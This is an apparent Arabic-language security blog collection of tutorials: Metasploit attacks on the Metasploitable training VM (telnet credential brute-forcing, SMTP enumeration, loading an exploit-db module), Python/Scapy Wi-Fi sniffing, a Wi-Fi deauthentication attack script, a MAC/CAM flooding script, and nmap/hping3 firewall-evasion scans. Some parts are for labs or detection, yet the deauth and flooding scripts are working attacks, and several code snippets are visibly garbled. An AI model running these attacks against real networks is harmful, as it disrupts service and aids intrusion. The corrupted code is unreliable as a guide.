Exploit telnet-http-smtp (metasploitable)

 السلام عليكم ورحمه الله وبركاته اليوم لديكم شرح استغللا 3 ابليكشنز في الميتاسبلويتابل

هم :
23-telnet
25-smtp 

80-http

فيديو الشرح : 

 


الاوامر المستخدمه :

23-telnet:
        1- msfconsole

        2- use auxiliary/scanner/telnet/telnet_login

        3-  set STOP_ON_SUCCESS true

        4-  set RHOSTS (ip target)

        5- set PASS_FILE (pass_list)

        6- set USER_FILE (users_list)

        7- exploit 

25-smtp:

        1- use auxiliary/scanner/smtp/smtp_enum
        2- set RHOSTS (ip_taregt)
        3- exploit

80-http:
        1- use auxiliary/scanner/http/http_version
        2- set RHOSTS (ip_target)
        3- exploit
        ثم سوف يظهر اصدار الاباتشي مثل الفيديو راح نبدا نبحث عن استغلال الفيرجن ..

الاستغلال الذي استخدمته في الفيديو :
https://www.exploit-db.com/exploits/18834
قومو بتحميله ثم تابعو الشرح.
المسار الذي سوف نضع به الاستغلال :

         1- /usr/share/metasploit-framework/modules/exploits/multi/http
        2- msfconsoel
        3- use exploit/multi/http/18834
        4- set RHOSTS (ip_target)
        5- set LHOST (your_ip)
        6- exploit

وبس كده اعتقد الشؤح خلص بالكامل وبالتوفيق للجميع وانتظرونا في شرح جديد ..
التلغرام:https://t.me/A_E_S_security 

التلغرام : https://t.me/C_S_A_T 

المجموعه للمناقشات :https://t.me/C_S_A_T_Team

Exploit telnet-http-smtp (metasploitable)


Add New Exploit to Metasploit

  

السلام عليكم ورحمه الله وبركاته 

اليوم معنا درس جديد باسم  

ADD NEW EXPLOIT TO METASPLOIT 

سوف نقوم باضافه استغلال لاحدي الثغرات للميتاسبلويت فقط يجب عليك متابعه الفيديو والاشتراك بقناتنا لمتابعته كل جديد عن الشروحات :

المسار الذي راح تضع به الثغره : /usr/share/metasploit-framework/modules

بعد دخول المسار حدد نوع الثغره ايش للويندوز لينكس ايش هو النوع بالتحديد وضيفها ..
وشكرا لكم والي لقاء اخر في شرح جديد باذن الله ..


التلغرام:https://t.me/A_E_S_security 


التلغرام : https://t.me/C_S_A_T 

المجموعه للمناقشات : 

 https://t.me/C_S_A_T_Team

Add New Exploit to Metasploit

 
  


FIX ERROR ARMITAGE (FIND ATTACK)

السلام عليكم

ناتيكم اليوم بحل مشكله ARMITAGE عندما تحاول عمل FIND ATTACK ل TARGET

الشرح:


المسار الذي سف تدخل وتحذف منه الملف :

/usr/share/metasploit-framework/modules/exploits/linux/misc/

اسم الملف المراد حذفه : 

saltstack_salt_unauth_rce.rb

وشكرا لكم 

قنواتنا للتواصل معنا : 

https://t.me/A_E_S_security

https://t.me/C_S_A_T




Fix Error Armitage (find attack) حل مشكله ارميتاج

 


METASPLOITABLE

السلام عليكم

ما هو METASPLOITABLE هي نظام يوجد به الكثير من الاستغلالات قامت بتصنيعه شركه rapid7 صنعته للتدريب والتعليم .. لكم شرح تثبيت النظام وفي الدروس القادمه سوف نشرح استغلالات النظام...




في هذا الفيديو بالاعلي قمنا بتثبيت النظام وفحصه ب  NMAP

الروابط المستخدمه في الشرح:

virtualbox :

اضغط هنا

METASPLOITABLE:

هنا

USER & PASS : msfadmin 

 
قناتنا : https://t.me/C_S_A_T

وشكرا جزيلا لكم

INSTALL METASPLOITABLE IN VIRTUALBOX (تثبيت الميتاسبلويت تبل)

اختبار اختراق الشبكات اللاسلكية بالبايثون (الجزاء الاول )

 

تتميز الأنظمة اللاسلكية بقدر كبير من المرونة ، ولكنها من ناحية أخرى تؤدي إلى مشكلات أمنية خطيرة أيضًا. وكيف يمكن أن يصبح هذا مشكلة أمنية خطيرة - لأن المهاجمين ، في حالة الاتصال اللاسلكي ، يحتاجون فقط إلى توفر إشارة للهجوم بدلاً من الوصول المادي كما في حالة الشبكة السلكية. يعد اختبار الاختراق للأنظمة اللاسلكية مهمة أسهل من القيام بذلك على الشبكة السلكية. لا يمكننا فعلاً تطبيق تدابير أمنية مادية جيدة ضد وسيط لاسلكي ، إذا كنا قريبين بما فيه الكفاية ، فسنكون قادرين على "سماع" (أو على الأقل يستطيع المحول اللاسلكي الخاص بك سماع) كل شيء يتدفق عبر الهواء.

المتطلبات الأساسية:

قبل أن نبدأ في تعلم المزيد حول pentesting للشبكة اللاسلكية ، دعونا نفكر في مناقشة المصطلحات وعملية الاتصال بين العميل والنظام اللاسلكي.

مصطلحات مهمة


دعونا الآن نتعلم المصطلحات الهامة المتعلقة pentesting للشبكة اللاسلكية.
نقطة الوصول (AP)

نقطة الوصول (AP)

هي العقدة المركزية في تطبيقات 802.11 اللاسلكية. تُستخدم هذه النقطة لتوصيل المستخدمين بمستخدمين آخرين داخل الشبكة ويمكن أيضًا أن تكون بمثابة نقطة اتصال بين الشبكة المحلية اللاسلكية (WLAN) وشبكة سلكية ثابتة. في شبكة WLAN ، نقطة الوصول هي محطة ترسل البيانات وتستقبلها.

معرف مجموعة الخدمات (SSID)


وهي عبارة عن سلسلة نصية طويلة يمكن قراءتها من 0 إلى 32 بايت وهي في الأساس الاسم المخصص لشبكة لاسلكية. يجب أن تستخدم جميع الأجهزة في الشبكة هذا الاسم الحساس لحالة الأحرف للاتصال عبر شبكة لاسلكية (Wi-Fi).
تعريف مجموعة الخدمات الأساسية (BSSID)

إنه عنوان MAC الخاص بشريحة Wi-Fi التي تعمل على نقطة وصول لاسلكية (AP). يتم إنشاؤه بشكل عشوائي.
رقم القناة

يمثل نطاق التردد اللاسلكي الذي تستخدمه نقطة الوصول (AP) للإرسال.
الاتصال بين العميل والنظام اللاسلكي

شيء مهم آخر يجب أن نفهمه هو عملية الاتصال بين العميل والنظام اللاسلكي. بمساعدة الرسم البياني التالي ، يمكننا فهم نفس الشيء -

 

الاتصال بين العميل والنظام اللاسلكي
إطار منارة

في عملية الاتصال بين العميل ونقطة الوصول ، ترسل AP بشكل دوري إطار منارة لإظهار وجودها. يأتي هذا الإطار مع معلومات تتعلق بـ SSID و BSSID ورقم القناة.

طلب المسبار(Probe request)


الآن ، سيرسل جهاز العميل طلب فحص للتحقق من وجود نقاط الوصول في النطاق. بعد إرسال طلب الفحص ، سينتظر استجابة المسبار من AP. يحتوي طلب Probe على معلومات مثل SSID لـ AP ومعلومات خاصة بالبائع ، إلخ.
استجابة المسبار

الآن ، بعد الحصول على طلب الفحص ، سترسل AP استجابة مسبار تحتوي على معلومات مثل معدل البيانات المدعومة والقدرة وما إلى ذلك.
طلب المصادقة

الآن ، سيرسل جهاز العميل إطار طلب مصادقة يحتوي على هويته.
استجابة المصادقة

الآن رداً على ذلك ، سترسل AP إطار استجابة مصادقة يشير إلى القبول أو الرفض.
طلب الرابطة

عندما تنجح المصادقة ، أرسل جهاز العميل إطار طلب ارتباط يحتوي على معدل بيانات مدعوم و SSID لـ AP.
استجابة الرابطة

الآن استجابةً لذلك ، سترسل AP إطار استجابة ارتباط يشير إلى القبول أو الرفض. سيتم إنشاء معرف ارتباط لجهاز العميل في حالة القبول.
البحث عن معرف مجموعة الخدمات اللاسلكية (SSID) باستخدام Python

يمكننا جمع المعلومات حول SSID بمساعدة طريقة المقبس الخام وكذلك باستخدام مكتبة Scapy.
طريقة المقبس الخام

لقد تعلمنا بالفعل أن mon0 يلتقط الحزم اللاسلكية ؛ لذلك ، نحتاج إلى ضبط وضع الشاشة على mon0. في Kali Linux ، يمكن القيام بذلك بمساعدة البرنامج النصي airmon-ng. بعد تشغيل هذا البرنامج النصي ، سيمنح البطاقة اللاسلكية اسمًا يقول wlan1. الآن بمساعدة الأمر التالي ، نحتاج إلى تمكين وضع المراقبة على mon0 -

root@root:~# airmon-ng start wlan0

نبداء بي استدعاء مكتبت socket

import socket

  الآن ، سننشئ socket يحتوي على ثلاث معلمات. تخبرنا المعلمة الأولى عن واجهة الحزمة 

(PF_PACKET for Linux specific and AF_INET for windows)

 ، تخبرنا المعلمة الثانية ما إذا كانت مقبسًا أوليًا ويخبرنا المعامل الثالث أننا 

مهتمون بجميع الحزم.

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0003))

الآن ، سيربط السطر التالي وضع mon0 و 0x0003.

s.bind(("mon0", 0x0003))

الآن ، نحتاج إلى انشاء قائمة فارغة ، والتي ستخزن SSID لنقاط الوصول. 

ap_list = []

الآن ، نحتاج إلى استدعاء الداله recvfrom () لاستلام الحزمة. 

لكي يستمر الاستنشاق ، سنستخدم حلقة while .

:wile Tru
packet = s.recvfrom(2048) ...

يظهر السطر التالي من الكود ما إذا كان الرتل 8 بتات يشير إلى إطار المنارة.

:"if packet[26] == "\x80 ...
: if packetkt[36:42] not in ap_list and ord(packetkt[63]) > 0 ...
ap_list.add(packetkt[36:42]).......
print("SSID:",(pkt[64:64+ord(pkt[63])],pkt[36:42].encode('hex')))

SSID الشم مع Scapy

Scapy هي واحدة من أفضل المكتبات التي يمكن أن تسمح لنا بسهولة شم

 حزم Wi-Fi. يمكنك تعلم Scapy 

بالتفصيل هنا. لتبدأ ، قم بتشغيل Sacpy في الوضع التفاعلي واستخدم

 الأمر conf للحصول على

 قيمة iface. الواجهة الافتراضية هي eth0. الآن نظرًا لأن لدينا القبة أعلاه

 ، نحتاج إلى تغيير

 هذا الوضع إلى mon0. يمكن القيام بذلك على النحو التالي -

"d>>> conf.iface = "mon0
d>>> packets = sniff(count = 3)
d>>> packets

<Sniffed: TCP:0 UDP:0 ICMP:0 Other:5>
d>>> len(packets)
3

دعونا الآن نستدعي Scapy كمكتبة. علاوة على ذلك ، سيعطينا

 تنفيذ نص Python النصي التالي SSID -

from scapy.all import *

الآن ، نحتاج إلى الإعلان عن قائمة فارغة ستخزن SSID لنقاط الوصول.

ap_list = []

سنقوم الآن بتعريف دالة باسم Packet_info () ،

 والتي سيكون لها منطق تحليل الحزمة الكامل. سيكون

 لها pkt الحجة.

:def Packet_info(pkt)

في البيان التالي ، سنطبق مرشحًا يمر فقط بحركة

 مرور Dot11 مما يعني مرور 802.11. السطر التالي

 هو أيضًا مرشح يمرر الحركة التي لها نوع type 0 (represents management frame)

 والنوع الفرعي subtype is 8 (represents beacon frame)

:if pkt.haslayer(Dot11)....
: if ((pkt.type == 0) & (pkt.subtype == 8)).......
: if pkt.addr2 not in ap_list...........
:ap_list.append(pkt.addr2)...............
:print("SSID:", (pkt.addr2, pkt.info))...............

الآن ، ستقوم وظيفة الشم باستنشاق البيانات ذات قيمة iface mon0 (للحزم اللاسلكية)

 واستدعاء وظيفة Packet_info.

sniff(iface = "mon0", prn = Packet_info)

لتنفيذ نصوص Python أعلاه ، نحتاج إلى بطاقة Wi-Fi

 قادرة على شم الهواء باستخدام وضع الشاشة.

الكشف عن عملاء نقطة الوصول


لاكتشاف عملاء نقاط الوصول

 ، نحتاج إلى التقاط إطار طلب الفحص. يمكننا القيام 

بذلك تمامًا كما فعلنا في نص

 Python لـ SSID sniffer باستخدام Scapy. نحتاج إلى 

إعطاء Dot11ProbeReq لالتقاط إطار

 طلب الفحص. فيما يلي نص Python لاكتشاف عملاء نقاط الوصول -

الهجمات اللاسلكية


من وجهة نظر رجل الأعمال ، من المهم جدًا فهم كيفية حدوث هجوم لاسلكي. في هذا القسم ،

 سنناقش نوعين من الهجمات اللاسلكية -

هجمات إلغاء المصادقة (deauth)

هجوم الفيضانات MAC

هجمات إلغاء المصادقة (deauth)

في عملية الاتصال بين جهاز عميل ونقطة وصول عندما

 يريد العميل قطع الاتصال ، فإنه يحتاج 

إلى إرسال إطار إلغاء المصادقة. استجابة لذلك 

الإطار من العميل ، سترسل AP أيضًا إطار إلغاء

 المصادقة. يمكن للمهاجم الاستفادة من هذه العملية

 العادية عن طريق انتحال عنوان MAC للضحية

 وإرسال إطار إلغاء المصادقة إلى AP. نتيجة لهذا 

، تم قطع الاتصال بين العميل و AP. فيما 

يلي نص Python لتنفيذ هجوم إلغاء المصادقة -

دعونا أولاً نستورد Scapy كمكتبة -

*from scapy.all import
import sys

بعد بيانين ، سيتم إدخال عنوان MAC الخاص بـ AP والضحية على التوالي.

BSSID = input("Enter MAC address of the Access Point:- ")
vctm_mac = input("Enter MAC address of the Victim:- ")

الآن ، نحتاج إلى إنشاء إطار إلغاء المصادقة. يمكن إنشاؤه عن طريق تنفيذ الكود التالي.

frame = RadioTap()/ Dot11(addr1 = vctm_mac, addr2 = BSSID, addr3 = BSSID)
/ Dot11Deauth()

يمثل السطر التالي من الكود العدد الإجمالي للحزم المرسلة ؛ هنا هو 500 و

الفاصل الزمني بين حزمتين.

sendp(frame, iface = "mon0", count = 500, inter = .1)

الناتج |

عند التنفيذ ، يولد الأمر أعلاه المخرجات التالية -

Enter MAC address of the Access
 Point:- (Here, we need to provide the MAC address of AP)
Enter MAC address of 
the Victim:- (Here, we need to provide the MAC address of the victim)

يتبع ذلك إنشاء إطار deauth ، والذي يتم إرساله بالتالي إلى نقطة الوصول نيابة عن

 العميل. سيؤدي هذا إلى إلغاء الاتصال بينهما.

السؤال هنا هو كيف نكتشف هجوم deauth باستخدام نص Python. سيساعد تنفيذ نص Python

 النصي التالي في اكتشاف مثل هذه الهجمات -

*from scapy.all import
i = 1
:def deauth_frame(pkt)
:if pkt.haslayer(Dot11)......
:if ((pkt.type == 0) & (pkt.subtype == 12)).........
global i..............
print ("Deauth frame detected: ", i)..............
 
sniff(iface = "mon0", prn = deauth_frame)......

في النص أعلاه ، تشير العبارة pkt.subtype == 12 إلى إطار deauth والمتغير I المحدد

 عالميًا يخبرنا عن عدد الحزم.

الناتج |

ينتج عن تنفيذ الكود أعلاه المخرجات التالية -

Deauth frame detected: 1
Deauth frame detected: 2
Deauth frame detected: 3
Deauth frame detected: 4
Deauth frame detected: 5
Deauth frame detected: 6

هجمات الفيضانات عنوان MAC


هجوم إغراق عنوان MAC (هجوم إغراق جدول CAM) هو نوع من هجمات الشبكة حيث 

يقوم المهاجم المتصل بمنفذ التبديل بإغراق واجهة المحول بعدد كبير جدًا من

 إطارات Ethernet بعناوين MAC مختلفة المصدر وهمية. تحدث تدفقات جدول CAM عند

 تدفق تدفق عناوين MAC إلى الجدول والوصول إلى حد جدول CAM. يؤدي هذا إلى عمل

 المحول مثل لوحة الوصل ، مما يؤدي إلى إغراق الشبكة بحركة المرور في جميع المنافذ.

 من السهل جدًا إطلاق مثل هذه الهجمات. يساعد نص Python النصي التالي في 

إطلاق هجوم إغراق CAM -

*from scapy.all import
:def generate_packets(self)
[] = packet_lis
:for i in xrange(1,1000)
packet = Ether(src = RandMAC(), 
/ dst = RandMAC())/IP(src = RandIP(), dst = RandIP())...........
packet_list.append(packet)
return packet_list...........


:def cam_overflow(packet_list)
sendp(packet_list, iface='wlan')......


:if __name__ == '__main__'

packet_list = generate_packets().....
cam_overflow(packet_list).....
الهدف الرئيسي من هذا النوع من الهجوم هو التحقق من أمان المفتاح. نحتاج إلى
 استخدام أمان المنفذ إذا أردنا تقليل تأثير هجوم الفيضانات MAC.



اختبار اختراق الشبكات اللاسلكية بالبايثون (الجزء الاول )

 

تقنيات تجاوز جدار الحماية الأساسية باستخدام Nmap و Hping3


أمان البيانات هو أولوية قصوى لمسؤولي الأنظمة. يحاول مسؤولو الأنظمة دائمًا إبقاء المنافذ مغلقة للاستخدام العام ، وهو أمر غير مطلوب. هناك العديد من حلول جدار الحماية المتاحة في السوق ، بدءًا من iptables البسيطة وتنتهي بحلول السحابة المعقدة. في حالتنا الحالية ، سوف نلقي نظرة على العديد من الأدوات المثيرة للاهتمام مثل Nmap و hping والطرق الخاصة بكيفية معرفة ما إذا كان أحد المنافذ يستخدم بالفعل بواسطة سيرفر ما 

 nmap

  الأداة الأولى التي سنحاول بها  فحص السيرفر  هي Nmap. يوفر العديد من الميزات للمساعدة في رسم الخرائط واستيعاب الشبكات المعقدة. إحدى التقنيات المثالية لفهم أمن الشبكة من منظور مسؤول النظام أو مختبري الاختراق هي محاولة التغلب عليها. يمكن أن تحاول جدران الحماية جعل مرحلة الاستطلاع وقدرات المسح الخاصة بـ Nmap أقل كفاءة للخصم. يمكن للمتسلل التهرب من جدران الحماية وأنظمة الكشف عن التسلل التي ينفذها خصومهم باستخدام العديد من تقنيات التهرب من جدار الحماية باستخدام Nmap. تدعم هذه الأداة أنواعًا متعددة من الفحص مثل Connect Scan (افتراضيًا) ، و ACK Scan ، و TCP scan ، و UDP Scan ، وما إلى ذلك ، ولدينا قدر كبير من البرامج النصية المتاحة ، والتي يمكننا استخدامها أثناء تنفيذ عمليات المسح وحتى عملية تقييم الثغرات الأمنية ، لذلك يمكن أن يبدأ المتسلل في تكوين صورة لطوبولوجيا شبكتك ومعرفة الأجهزة المتصلة بها ، وإصدارات أنظمة التشغيل التي تعمل ، والمنافذ المفتوحة ، وما هي نقاط الضعف التي قد توجد.

Firewalls Bypassing Scan Examples

nmap -f 192.168.1.5
 

nmap -f 192.168.1.5

 

يحث الأمر -f عملية الفحص على نشر حزم IP مجزأة صغيرة. على وجه التحديد ، يستخدم أمرنا 16 بايت لكل جزء مما يقلل من عدد الأجزاء. الحزم المجزأة هي واحدة منها وتتكون من إرسال عدة حزم صغيرة بدلاً من حزمة واحدة ذات حجم عادي.

يمكنك استخدام الحزم المجزأة مع Nmap باستخدام الخيار "-f" ، ومع ذلك ، في الوقت الحاضر ، يكتشف جدار الحماية و IDS الحزم المجزأة.

 nmap --mtu 16 192.168.1.5

nmap --mtu 16 192.168.1.5


يسمح لنا الأمر nmap --mtu أعلاه بتحديد حجم الإزاحة الخاص بنا. تذكر أن حجم الإزاحة يجب أن يكون من مضاعفات 16.

    يوفر Nmap الخيار للمستخدم لتعيين MTU (وحدة الإرسال القصوى) للحزمة.
    هذا مشابه لتقنية تجزئة الحزمة.
    أثناء الفحص ، سيقوم Nmap بإنشاء حزم بحجم يعتمد على الرقم الذي سنقدمه.
    في هذا المثال ، قدمنا ​​الرقم 24 ، لذا فإن Nmap سينشئ حزمًا بحجم 24 بايت ، مما يتسبب في حدوث ارتباك في جدار الحماية.
    ضع في اعتبارك أن رقم MTU يجب أن يكون من مضاعفات 8 (8 ، 16 ، 24 ، 32 ، إلخ).

nmap --badsum 192.168.1.5

 

nmap --badsum 192.168.1.5 

 يحث الأمر Badsum على نشر مجموع اختباري TCP / UDP / SCTP غير صالح للحزم المرسلة إلى هدفنا. نظرًا لأن كل مكدس IP للمضيف سوف يسقط الحزم بشكل صحيح ، فمن المحتمل أن تكون كل استجابة مقبولة ناتجة عن جدار حماية أو نظام كشف التسلل الذي لم يكن معنيًا بتأكيد المجموع الاختباري. بالإضافة إلى ذلك ، نحاول استخدام بعض البرامج النصية من Nmap NSE مثل "تجاوز جدار الحماية" ، ولكن يجب أن أحذرك من أن النتائج من استخدام هذا البرنامج النصي يمكن أن تكون إيجابية خاطئة بنسبة عالية.

nmap -sS -T5 192.168.1.5 --script firewall-bypass

 nmap -sS -T5 192.168.1.5 --script firewall-bypass

 يكتشف هذا البرنامج النصي ثغرة أمنية في Netfilter وجدران الحماية الأخرى التي تستخدم المساعدين لفتح المنافذ ديناميكيًا لبروتوكولات مثل FTP و sip (في حالتنا ، نقوم أيضًا بدمجها مع الفحص الخفي). يعمل البرنامج النصي عن طريق انتحال حزمة من الخادم الهدف للمطالبة بفتح اتصال ذي صلة بالمنفذ الهدف ، والذي سيتم تنفيذه بواسطة جدار الحماية من خلال منفذ مساعد البروتوكول المناسب. يجب أن يكون جهاز الهجوم على نفس جزء الشبكة مثل جدار الحماية حتى يعمل هذا. يدعم البرنامج النصي مساعد FTP على كل من IPv4 و IPv6. يستخدم مرشح المسار الحقيقي لمنع مثل هذه الهجمات. 

Vulnerability Scan Example

nmap -sV -T4 -F 192.168.1.5 --script vuln


هذا هو الاستخدام البسيط لفحص سريع مطول للثغرات الأمنية بمساعدة Nmap و NSE. أدناه ، سوف نقدم بعض المعلومات حول المفاتيح التي نستخدمها هنا:

     -سيفحص المنافذ المفتوحة لتحديد معلومات الخدمة / الإصدار
     -T4 هذا الإعداد مطلوب لإعداد سرعة المسح (T5 هو المسح الأقصى والأكثر عدوانية)
     -F يعني أننا سنقوم بمسح 100 منفذ الأكثر شيوعًا (هذا الخيار مطلوب أيضًا لإجراء عمليات مسح سريعة)
     يخبر --script vuln Nmap بتحميل برنامج نصي معين من NSE ، مما سيساعدنا في تحديد نقاط الضعف بالنتائج بناءً على فحص المنفذ وتحليل الشعارات

 

 


hping3hping3

Hping عبارة عن مجمع / محلل حزم TCP / IP موجه نحو سطر الأوامر. الواجهة مستوحاة من أمر ping (8) unix ، لكن hping ليس قادرًا فقط على إرسال طلبات ارتداد ICMP. وهو يدعم بروتوكولات TCP و UDP و ICMP و RAW-IP ، وله وضع التتبع ، والقدرة على إرسال الملفات بين قناة مغطاة ، والعديد من الميزات الأخرى. إنه أحد أنواع أجهزة اختبار أمان الشبكة وأحد الأدوات الواقعية للتدقيق الأمني ​​واختبار جدران الحماية والشبكات. تم استخدامه لاستغلال تقنية المسح الخامل ،
والتي يتم تنفيذها الآن في الماسح الضوئي Nmap أيضًا.

على الرغم من استخدام hping بشكل أساسي كأداة أمان في الماضي ، إلا أنه يمكن استخدامه بعدة طرق بواسطة الأشخاص الذين لا يهتمون بالأمان لاختبار الشبكات والمضيفين. تتضمن مجموعة فرعية من الأشياء التي يمكنك القيام بها باستخدام hping ما يلي:

  • Firewall testing
  • Advanced port scanning
  • Network testing, using different protocols, TOS, and fragmentation
  • Manual path MTU discovery
  • Remote OS fingerprinting
  • Advanced traceroute under all the supported protocols
  • TCP/IP stacks auditing
  • Remote uptime guessing

Firewall Testing Scan Examples

أولاً ، سنرسل حزمة PING (طلب صدى ICMP) إلى هدفنا.
 
 
hping3 -1 -c 1 192.168.1.5
 hping3 -1 -c 1 192.168.1.5

  يخبر –1 في هذا الأمر hping3 باستخدام ICMP ، والذي يرسل افتراضيًا رد الارتداد.
ينص -c 1 على أننا نريد فقط إرسال حزمة واحدة ، وأن 192.168.1.5 هو هدفنا. من إخراج الأمر ، نرى أنه تم إرسال حزمة واحدة واستلامها.

سنقوم باختبار المنفذ المعروف 80 (HTTP). نظرًا لأن SYN هي الخطوة الأولى في المصافحة الثلاثية لاتصال TCP (SYN ، SYN-ACK ، ACK) ، إذا كان المنفذ مفتوحًا ، فسنحصل على استجابة SYN-ACK المناسبة بسبب محاولة الهدف إكمال الاتصال . هذه تقنية شائعة تُستخدم في فحص المنافذ وتُعرف باسم "اتصال نصف مفتوح".

hping3 -S -c 1 -s 5151 -p 80 192.168.1.5

hping3 -S -c 1 -s 5151 -p 80 192.168.1.5

 في النتيجة ، يجب أن نرى أن هدفنا قد استجاب ، ويظهر الإخراج "flags = SA" ، مما يؤكد أننا تلقينا حزمة SYN-ACK. نظرًا لأن هدفنا استجاب لـ SYN-ACK (تم تمييزه بعلامة [S.] و "ack") ، فإننا نعلم أن منفذ هدفنا 80 مفتوح ويقبل الاتصالات.

رأينا في المثال السابق أنه عندما نرسل حزمة SYN إلى منفذ مفتوح ، نتلقى SYN-ACK. لذلك ، دعونا نرى نوع الاستجابة التي نحصل عليها عندما نرسل حزمة ACK (الجزء الأخير من المصافحة الثلاثية).

hping3 -A -c 1 -s 5151 -p 80 192.168.1.5

hping3 -A -c 1 -s 5151 -p 80 192.168.1.5

في استجابة الخادم ، يمكننا أن نرى أن هدفنا قد استجاب ، ولكن هذه المرة مع مجموعة علامة RST. لقد اختبرنا مضيفًا بنجاح ، وأعدنا القواعد لتصحيح المشكلات التي وجدناها ، وأعدنا اختبار الوظائف المناسبة.

تجاوز سعيد!

تقنيات تجاوز جدار الحماية الأساسية باستخدام Nmap و Hping3